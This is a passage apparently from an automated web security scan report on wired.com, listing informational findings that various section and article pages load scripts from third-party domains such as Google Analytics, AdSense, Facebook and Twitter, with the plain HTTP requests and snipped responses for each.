Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /culture/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=71
Expires: Wed, 12 Jan 2011 15:37:05 GMT
Date: Wed, 12 Jan 2011 15:35:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.63. http://www.wired.com/dangerroom/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/dangerroom/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /dangerroom/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.64. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 09:44:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=427
Expires: Wed, 12 Jan 2011 15:46:00 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.65. http://www.wired.com/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /entertainment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=21
Expires: Wed, 12 Jan 2011 15:36:37 GMT
Date: Wed, 12 Jan 2011 15:36:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.66. http://www.wired.com/epicenter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widget.networkedblogs.com/getwidget?bid=204567
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /epicenter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:48:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=469
Expires: Wed, 12 Jan 2011 15:46:57 GMT
Date: Wed, 12 Jan 2011 15:39:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.67. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widget.networkedblogs.com/getwidget?bid=204567
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:02:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:15 GMT
Date: Wed, 12 Jan 2011 15:39:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.68. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/epicenter/2011/01/metropcs-net-neutrality/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widget.networkedblogs.com/getwidget?bid=204567
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /epicenter/2011/01/metropcs-net-neutrality/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:04:29 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:47:01 GMT
Date: Wed, 12 Jan 2011 15:39:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.69. http://www.wired.com/gadgetlab/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gadgetlab/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://wiredgadgetlab.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+39803771688e6b83ac1453e6e9bbbb1e4a5a5d15+1294846745
http://www.google-analytics.com/urchin.js

Request

GET /gadgetlab/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:39:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:23 GMT
Date: Wed, 12 Jan 2011 15:39:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredgadgetlab.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+39803771688e6b83ac1453e6e9bbbb1e4a5a5d15+1294846745"></script>
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.70. http://www.wired.com/gadgets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gadgets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /gadgets/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=89
Expires: Wed, 12 Jan 2011 15:37:45 GMT
Date: Wed, 12 Jan 2011 15:36:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.71. http://www.wired.com/gamelife/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gamelife/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /gamelife/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:43:51 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:42 GMT
Date: Wed, 12 Jan 2011 15:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.72. http://www.wired.com/gaming/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/gaming/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /gaming/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=114
Expires: Wed, 12 Jan 2011 15:38:18 GMT
Date: Wed, 12 Jan 2011 15:36:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.73. http://www.wired.com/geekdad/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/geekdad/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://mediaplayer.yahoo.com/js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://static.zemanta.com/readside/loader.js
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /geekdad/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.74. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=447
Expires: Wed, 12 Jan 2011 15:47:21 GMT
Date: Wed, 12 Jan 2011 15:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.75. http://www.wired.com/inspiredbyyou/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/inspiredbyyou/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /inspiredbyyou/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:38:23 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=466
